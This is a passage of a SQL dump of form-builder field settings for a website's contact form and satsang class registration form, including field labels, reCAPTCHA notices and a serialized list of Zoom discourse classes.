left'),(17221,604,'label_pos','above','label_pos','above'),(17222,604,'placeholder','','placeholder',''),(17223,604,'first_name','','first_name',''),(17224,604,'last_name','','last_name',''),(17225,604,'user_address_1','','user_address_1',''),(17226,604,'user_address_2','','user_address_2',''),(17227,604,'user_city','','user_city',''),(17228,604,'user_zip','','user_zip',''),(17229,604,'user_phone','','user_phone',''),(17230,604,'user_email','','user_email',''),(17231,604,'user_info_field_group','1','user_info_field_group','1'),(17232,604,'disable_input','0','disable_input','0'),(17233,604,'mask','','mask',''),(17234,604,'input_limit','','input_limit',''),(17235,604,'input_limit_type','char','input_limit_type','char'),(17236,604,'calc_auto_include','0','calc_auto_include','0'),(17237,604,'datepicker','0','datepicker','0'),(17238,604,'user_state','0','user_state','0'),(17239,604,'autocomplete_off','0','autocomplete_off','0'),(17240,604,'num_sort','0','num_sort','0'),(17241,604,'admin_label','','admin_label',''),(17242,604,'user_info_field_group_name','','user_info_field_group_name',''),(17243,604,'user_info_field_group_custom','','user_info_field_group_custom',''),(17244,604,'show_help','0','show_help','0'),(17245,604,'help_text','','help_text',''),(17246,604,'show_desc','0','show_desc','0'),(17247,604,'desc_pos','none','desc_pos','none'),(17248,604,'desc_text','','desc_text',''),(17249,604,'element_class','','element_class',''),(17250,604,'required','1','required','1'),(17251,604,'key','textbox_303','key','textbox_303'),(17252,604,'parent_id','13','parent_id','13'),(17253,604,'editActive','','editActive',''),(17254,604,'field_label','Message Subject','field_label','Message Subject'),(17255,604,'field_key','textbox_303','field_key','textbox_303'),(17256,604,'default','','default',''),(17257,604,'container_class','one-half first','container_class','one-half first'),(17258,604,'manual_key','','manual_key',''),(17259,604,'custom_mask','','custom_mask',''),(17260,604,'custom_name_attribute','','custom_name_attribute',''),(17261,604,'personally_identifiable','','personally_identifiable',''),(17262,604,'value','','value',''),(17263,604,'idAttribute','id','idAttribute','id'),(17264,604,'drawerDisabled','','drawerDisabled',''),(17265,605,'type','textarea','type','textarea'),(17266,605,'order','7','order','7'),(17267,605,'fav_id','','fav_id',''),(17268,605,'def_id','','def_id',''),(17269,605,'label','Enter Your Message Here','label','Enter Your Message Here'),(17270,605,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(17271,605,'label_pos','above','label_pos','above'),(17272,605,'default_value','','default_value',''),(17273,605,'textarea_rte','0','textarea_rte','0'),(17274,605,'textarea_media','0','textarea_media','0'),(17275,605,'disable_rte_mobile','0','disable_rte_mobile','0'),(17276,605,'input_limit','','input_limit',''),(17277,605,'input_limit_type','char','input_limit_type','char'),(17278,605,'calc_auto_include','0','calc_auto_include','0'),(17279,605,'num_sort','0','num_sort','0'),(17280,605,'admin_label','','admin_label',''),(17281,605,'show_help','0','show_help','0'),(17282,605,'help_text','','help_text',''),(17283,605,'show_desc','0','show_desc','0'),(17284,605,'desc_pos','none','desc_pos','none'),(17285,605,'desc_text','','desc_text',''),(17286,605,'element_class','','element_class',''),(17287,605,'required','1','required','1'),(17288,605,'default','','default',''),(17289,605,'key','textarea_276','key','textarea_276'),(17290,605,'parent_id','13','parent_id','13'),(17291,605,'editActive','','editActive',''),(17292,605,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(17293,605,'field_key','textarea_276','field_key','textarea_276'),(17294,605,'placeholder','','placeholder',''),(17295,605,'container_class','','container_class',''),(17296,605,'manual_key','','manual_key',''),(17297,605,'value','','value',''),(17298,605,'idAttribute','id','idAttribute','id'),(17299,606,'type','html','type','html'),(17300,606,'order','8','order','8'),(17301,606,'fav_id','','fav_id',''),(17302,606,'def_id','','def_id',''),(17303,606,'label','Text','label','Text'),(17304,606,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(17305,606,'default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.'),(17306,606,'desc_el','div','desc_el','div'),(17307,606,'show_desc','0','show_desc','0'),(17308,606,'desc_pos','none','desc_pos','none'),(17309,606,'desc_text','','desc_text',''),(17310,606,'element_class','','element_class',''),(17311,606,'default','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','default','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.'),(17312,606,'key','html_305','key','html_305'),(17313,606,'parent_id','13','parent_id','13'),(17314,606,'editActive','','editActive',''),(17315,606,'field_label','Text','field_label','Text'),(17316,606,'field_key','html_305','field_key','html_305'),(17317,606,'container_class','','container_class',''),(17318,606,'idAttribute','id','idAttribute','id'),(17645,639,'editActive','','editActive',''),(17643,638,'drawerDisabled','','drawerDisabled',''),(17644,282,'drawerDisabled','','drawerDisabled',''),(17642,638,'key','html_1663800740469','key','html_1663800740469'),(17641,638,'element_class','','element_class',''),(17640,638,'container_class','','container_class',''),(17329,608,'type','submit','type','submit'),(17330,608,'order','10','order','10'),(17331,608,'fav_id','','fav_id',''),(17332,608,'def_id','','def_id',''),(17333,608,'label','Submit','label','Submit'),(17334,608,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(17335,608,'show_help','0','show_help','0'),(17336,608,'help_text','','help_text',''),(17337,608,'show_desc','0','show_desc','0'),(17338,608,'desc_pos','none','desc_pos','none'),(17339,608,'desc_text','','desc_text',''),(17340,608,'processing_label','Processing','processing_label','Processing'),(17341,608,'element_class','','element_class',''),(17342,608,'key','submit_278','key','submit_278'),(17343,608,'parent_id','13','parent_id','13'),(17344,608,'editActive','','editActive',''),(17345,608,'field_label','Submit','field_label','Submit'),(17346,608,'field_key','submit_278','field_key','submit_278'),(17347,608,'container_class','','container_class',''),(17348,608,'idAttribute','id','idAttribute','id'),(17646,639,'order','9','order','9'),(17647,639,'idAttribute','id','idAttribute','id'),(17648,639,'label','HTML','label','HTML'),(17649,639,'type','html','type','html'),(17650,639,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17651,639,'container_class','','container_class',''),(17652,639,'element_class','','element_class',''),(17653,639,'key','html_1663800773041','key','html_1663800773041'),(17654,639,'drawerDisabled','','drawerDisabled',''),(17655,640,'editActive','','editActive',''),(17656,640,'order','9','order','9'),(17657,640,'idAttribute','id','idAttribute','id'),(17658,640,'label','HTML','label','HTML'),(17659,640,'type','html','type','html'),(17660,640,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17661,640,'container_class','','container_class',''),(17662,640,'element_class','','element_class',''),(17663,640,'key','html_1663800814752','key','html_1663800814752'),(17664,640,'drawerDisabled','','drawerDisabled',''),(17665,641,'editActive','','editActive',''),(17666,641,'order','11','order','11'),(17667,641,'idAttribute','id','idAttribute','id'),(17668,641,'label','HTML','label','HTML'),(17669,641,'type','html','type','html'),(17670,641,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17671,641,'container_class','','container_class',''),(17672,641,'element_class','','element_class',''),(17673,641,'key','html_1663801397261','key','html_1663801397261'),(17674,641,'drawerDisabled','','drawerDisabled',''),(17675,642,'editActive','','editActive',''),(17676,642,'order','13','order','13'),(17677,642,'idAttribute','id','idAttribute','id'),(17678,642,'type','html','type','html'),(17679,642,'label','HTML','label','HTML'),(17680,642,'default','','default',''),(17681,642,'container_class','','container_class',''),(17682,642,'element_class','','element_class',''),(17683,642,'key','html_1663801395614','key','html_1663801395614'),(17684,643,'editActive','','editActive',''),(17685,643,'order','9','order','9'),(17686,643,'idAttribute','id','idAttribute','id'),(17687,643,'label','HTML','label','HTML'),(17688,643,'type','html','type','html'),(17689,643,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17690,643,'container_class','','container_class',''),(17691,643,'element_class','','element_class',''),(17692,643,'key','html_1663801551902','key','html_1663801551902'),(17693,643,'drawerDisabled','','drawerDisabled',''),(17694,644,'editActive','','editActive',''),(17695,644,'order','11','order','11'),(17696,644,'idAttribute','id','idAttribute','id'),(17697,644,'label','HTML','label','HTML'),(17698,644,'type','html','type','html'),(17699,644,'default','','default',''),(17700,644,'container_class','','container_class',''),(17701,644,'element_class','','element_class',''),(17702,644,'key','html_1663801548990','key','html_1663801548990'),(17703,645,'parent_id','37','parent_id','37'),(17704,645,'container_class','','container_class',''),(17705,645,'element_class','','element_class',''),(17706,645,'field_label','Satsang Class Registration','field_label','Satsang Class Registration'),(17707,645,'field_key','satsang_class_registration_1632437126898','field_key','satsang_class_registration_1632437126898'),(17708,645,'key','satsang_class_registration_1632437126898','key','satsang_class_registration_1632437126898'),(17709,645,'type','html','type','html'),(17710,645,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(17711,645,'default','<p style=\"font-size:18px; font-weight: 600;\" align=\"center\">Please fill in your details in the \'Satsang Class Registration\' form below and you will be automatically registered.</p>','default','<p style=\"font-size:18px; font-weight: 600;\" align=\"center\">Please fill in your details in the \'Satsang Class Registration\' form below and you will be automatically registered.</p>'),(17712,645,'order','3','order','3'),(17713,645,'editActive','','editActive',''),(17714,645,'objectDomain','fields','objectDomain','fields'),(17715,645,'objectType','Field','objectType','Field'),(17716,645,'drawerDisabled','','drawerDisabled',''),(17717,645,'label','Satsang Class Registration','label','Satsang Class Registration'),(17718,645,'idAttribute','id','idAttribute','id'),(17719,646,'editActive','','editActive',''),(17720,646,'order','2','order','2'),(17721,646,'idAttribute','id','idAttribute','id'),(17722,646,'label','Divider','label','Divider'),(17723,646,'type','hr','type','hr'),(17724,646,'container_class','','container_class',''),(17725,646,'element_class','','element_class',''),(17726,646,'key','hr_1639606449220','key','hr_1639606449220'),(17727,646,'field_label','Divider','field_label','Divider'),(17728,646,'field_key','hr_1639606449220','field_key','hr_1639606449220'),(17729,647,'element_class','','element_class',''),(17730,647,'container_class','','container_class',''),(17731,647,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(17732,647,'type','hr','type','hr'),(17733,647,'key','hr_2','key','hr_2'),(17734,647,'label','Divider','label','Divider'),(17735,647,'objectType','Field','objectType','Field'),(17736,647,'objectDomain','fields','objectDomain','fields'),(17737,647,'editActive','','editActive',''),(17738,647,'order','13','order','13'),(17739,647,'field_label','Divider','field_label','Divider'),(17740,647,'field_key','hr_2','field_key','hr_2'),(17741,647,'parent_id','37','parent_id','37'),(17742,647,'idAttribute','id','idAttribute','id'),(17743,648,'objectType','Field','objectType','Field'),(17744,648,'objectDomain','fields','objectDomain','fields'),(17745,648,'editActive','','editActive',''),(17746,648,'order','14','order','14'),(17747,648,'label','HTML','label','HTML'),(17748,648,'key','html','key','html'),(17749,648,'type','html','type','html'),(17750,648,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(17751,648,'default','<p><i>We take your                                                privacy very seriously                                                and will never share                                                your personal                                                information with anyone.                                                Any personal information                                                provided to us will be                                                used only to respond or                                                to service the request                                                or inquiry made</i></p><p><i><b>** For in-person classes</b> -- Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </i><i><br></i></p>','default','<p><i>We take your                                                privacy very seriously                                                and will never share                                                your personal                                                information with anyone.                                                Any personal information                                                provided to us will be                                                used only to respond or                                                to service the request                                                or inquiry made</i></p><p><i><b>** For in-person classes</b> -- Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </i><i><br></i></p>'),(17752,648,'container_class','','container_class',''),(17753,648,'element_class','','element_class',''),(17754,648,'field_label','HTML','field_label','HTML'),(17755,648,'field_key','html','field_key','html'),(17756,648,'drawerDisabled','','drawerDisabled',''),(17757,648,'parent_id','37','parent_id','37'),(17758,648,'idAttribute','id','idAttribute','id'),(17759,649,'editActive','','editActive',''),(17760,649,'order','12','order','12'),(17761,649,'label','Enter Message for Arahata (Optional)','label','Enter Message for Arahata (Optional)'),(17762,649,'type','textarea','type','textarea'),(17763,649,'key','enter_message_for_arahata_optional_1599679737041','key','enter_message_for_arahata_optional_1599679737041'),(17764,649,'label_pos','default','label_pos','default'),(17765,649,'required','','required',''),(17766,649,'default','','default',''),(17767,649,'placeholder','','placeholder',''),(17768,649,'container_class','','container_class',''),(17769,649,'element_class','','element_class',''),(17770,649,'input_limit','','input_limit',''),(17771,649,'input_limit_type','characters','input_limit_type','characters'),(17772,649,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(17773,649,'manual_key','','manual_key',''),(17774,649,'admin_label','','admin_label',''),(17775,649,'help_text','','help_text',''),(17776,649,'textarea_rte','','textarea_rte',''),(17777,649,'disable_rte_mobile','','disable_rte_mobile',''),(17778,649,'textarea_media','','textarea_media',''),(17779,649,'value','','value',''),(17780,649,'drawerDisabled','','drawerDisabled',''),(17781,649,'idAttribute','id','idAttribute','id'),(17782,649,'field_label','Enter Message for Arahata (Optional)','field_label','Enter Message for Arahata (Optional)'),(17783,649,'field_key','enter_message_for_arahata_optional_1599679737041','field_key','enter_message_for_arahata_optional_1599679737041'),(17798,651,'drawerDisabled','','drawerDisabled',''),(17799,651,'parent_id','37','parent_id','37'),(17800,651,'value','','value',''),(17801,651,'field_key','less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498','field_key','less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498'),(17802,651,'field_label','<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone','field_label','<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone'),(17803,651,'custom_mask','','custom_mask',''),(17804,651,'mask','(999) 999-9999','mask','(999) 999-9999'),(17805,651,'disable_browser_autocomplete','','disable_browser_autocomplete',''),(17806,651,'desc_text','','desc_text',''),(17807,651,'help_text','','help_text',''),(17808,651,'admin_label','','admin_label',''),(17809,651,'objectType','Field','objectType','Field'),(17810,651,'objectDomain','fields','objectDomain','fields'),(17811,651,'editActive','','editActive',''),(17812,651,'order','7','order','7'),(17813,651,'label','<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone','label','<i class=\"fa fa-phone\" aria-hidden=\"true\"></i> Phone'),(17814,651,'key','less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498','key','less_than_i_class_fa_fa-phone_aria-hidden_true_greater_than_less_than_i_greater_than_phone_1662051810498'),(17815,651,'type','textbox','type','textbox'),(17816,651,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(17817,651,'label_pos','default','label_pos','default'),(17818,651,'required','1','required','1'),(17819,651,'placeholder','','placeholder',''),(17820,651,'default','','default',''),(17821,651,'container_class','one-half','container_class','one-half'),(17822,651,'element_class','','element_class',''),(17823,651,'input_limit','','input_limit',''),(17824,651,'input_limit_type','characters','input_limit_type','characters'),(17825,651,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(17826,651,'manual_key','','manual_key',''),(17827,651,'disable_input','','disable_input',''),(17828,651,'personally_identifiable','','personally_identifiable',''),(17829,651,'custom_name_attribute','','custom_name_attribute',''),(17830,651,'idAttribute','id','idAttribute','id'),(17831,652,'objectType','Field','objectType','Field'),(17832,652,'objectDomain','fields','objectDomain','fields'),(17833,652,'editActive','','editActive',''),(17834,652,'order','5','order','5'),(17835,652,'label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name','label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name'),(17836,652,'key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625','key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625'),(17837,652,'type','lastname','type','lastname'),(17838,652,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(17839,652,'label_pos','default','label_pos','default'),(17840,652,'required','1','required','1'),(17841,652,'default','','default',''),(17842,652,'placeholder','','placeholder',''),(17843,652,'container_class','one-half','container_class','one-half'),(17844,652,'element_class','','element_class',''),(17845,652,'admin_label','','admin_label',''),(17846,652,'help_text','','help_text',''),(17847,652,'desc_text','','desc_text',''),(17848,652,'field_label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name','field_label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> Last Name'),(17849,652,'field_key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625','field_key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_last_name_1662052180625'),(17850,652,'custom_name_attribute','lname','custom_name_attribute','lname'),(17851,652,'personally_identifiable','1','personally_identifiable','1'),(17852,652,'value','','value',''),(17853,652,'parent_id','37','parent_id','37'),(17854,652,'idAttribute','id','idAttribute','id'),(17855,652,'drawerDisabled','','drawerDisabled',''),(17856,653,'objectType','Field','objectType','Field'),(17857,653,'objectDomain','fields','objectDomain','fields'),(17858,653,'editActive','','editActive',''),(17859,653,'order','6','order','6'),(17860,653,'label','<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email','label','<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email'),(17861,653,'key','less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837','key','less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837'),(17862,653,'type','email','type','email'),(17863,653,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(17864,653,'label_pos','default','label_pos','default'),(17865,653,'required','1','required','1'),(17866,653,'default','','default',''),(17867,653,'placeholder','','placeholder',''),(17868,653,'container_class','one-half first','container_class','one-half first'),(17869,653,'element_class','','element_class',''),(17870,653,'admin_label','','admin_label',''),(17871,653,'help_text','','help_text',''),(17872,653,'desc_text','','desc_text',''),(17873,653,'field_label','<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email','field_label','<i class=\'fa fa-envelope\' aria-hidden=\'true\'></i> Email'),(17874,653,'field_key','less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837','field_key','less_than_i_class_fa_fa-envelope_aria-hidden_true_greater_than_less_than_i_greater_than_email_1662052219837'),(17875,653,'custom_name_attribute','email','custom_name_attribute','email'),(17876,653,'personally_identifiable','1','personally_identifiable','1'),(17877,653,'value','','value',''),(17878,653,'parent_id','37','parent_id','37'),(17879,653,'idAttribute','id','idAttribute','id'),(17880,653,'drawerDisabled','','drawerDisabled',''),(17881,654,'drawerDisabled','','drawerDisabled',''),(17882,654,'objectType','Field','objectType','Field'),(17883,654,'objectDomain','fields','objectDomain','fields'),(17884,654,'editActive','','editActive',''),(17885,654,'order','4','order','4'),(17886,654,'label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name','label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name'),(17887,654,'key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711','key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711'),(17888,654,'type','firstname','type','firstname'),(17889,654,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(17890,654,'label_pos','default','label_pos','default'),(17891,654,'required','1','required','1'),(17892,654,'default','','default',''),(17893,654,'placeholder','','placeholder',''),(17894,654,'container_class','one-half first','container_class','one-half first'),(17895,654,'element_class','','element_class',''),(17896,654,'admin_label','','admin_label',''),(17897,654,'help_text','','help_text',''),(17898,654,'desc_text','','desc_text',''),(17899,654,'field_label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name','field_label','<i class=\"fa fa-user\" aria-hidden=\"true\"></i> First Name'),(17900,654,'field_key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711','field_key','less_than_i_class_fa_fa-user_aria-hidden_true_greater_than_less_than_i_greater_than_first_name_1662052173711'),(17901,654,'custom_name_attribute','fname','custom_name_attribute','fname'),(17902,654,'personally_identifiable','1','personally_identifiable','1'),(17903,654,'value','','value',''),(17904,654,'parent_id','37','parent_id','37'),(17905,654,'idAttribute','id','idAttribute','id'),(17906,655,'objectType','Field','objectType','Field'),(17907,655,'objectDomain','fields','objectDomain','fields'),(17908,655,'editActive','','editActive',''),(17909,655,'order','15','order','15'),(17910,655,'label','Register','label','Register'),(17911,655,'key','register','key','register'),(17912,655,'type','submit','type','submit'),(17913,655,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(17914,655,'processing_label','Processing','processing_label','Processing'),(17915,655,'container_class','','container_class',''),(17916,655,'element_class','','element_class',''),(17917,655,'field_label','Register','field_label','Register'),(17918,655,'field_key','register','field_key','register'),(17919,655,'parent_id','37','parent_id','37'),(17920,655,'idAttribute','id','idAttribute','id'),(17921,656,'editActive','','editActive',''),(17922,656,'order','11','order','11'),(17923,656,'idAttribute','id','idAttribute','id'),(17924,656,'label','Select One Class Per Registrant','label','Select One Class Per Registrant'),(17925,656,'type','listradio','type','listradio'),(17926,656,'key','select_one_class_per_registrant_1658696832524','key','select_one_class_per_registrant_1658696832524'),(17927,656,'label_pos','default','label_pos','default'),(17928,656,'required','1','required','1'),(17929,656,'options','a:16:{i:0;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:0;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:77:\"The Easy Way Discourses - STARTS IN NOVEMBER -- 2nd Tuesday at 7:00 pm - Zoom\";s:5:\"value\";s:76:\"The Easy Way Discourses - STARTS IN NOVEMBER -- 2nd Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:1;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:1;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:80:\"The ECK Dream 1 Discourses - STARTS IN JANUARY -- 1st Thursday at 7:00 pm - Zoom\";s:5:\"value\";s:79:\"The ECK Dream 1 Discourses - STARTS IN JANUARY -- 1st Thursday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:78:\"The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 3rd Monday at 7:00 pm - Zoom\";s:5:\"value\";s:77:\"The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 3rd Monday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:3;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:4;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:83:\"Letters of Light and Sound 1 - STARTS IN NOVEMBER -- 1st Thursday at 6:45 pm - Zoom\";s:5:\"value\";s:82:\"Letters of Light and Sound 1 - STARTS IN NOVEMBER -- 1st Thursday at 645 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 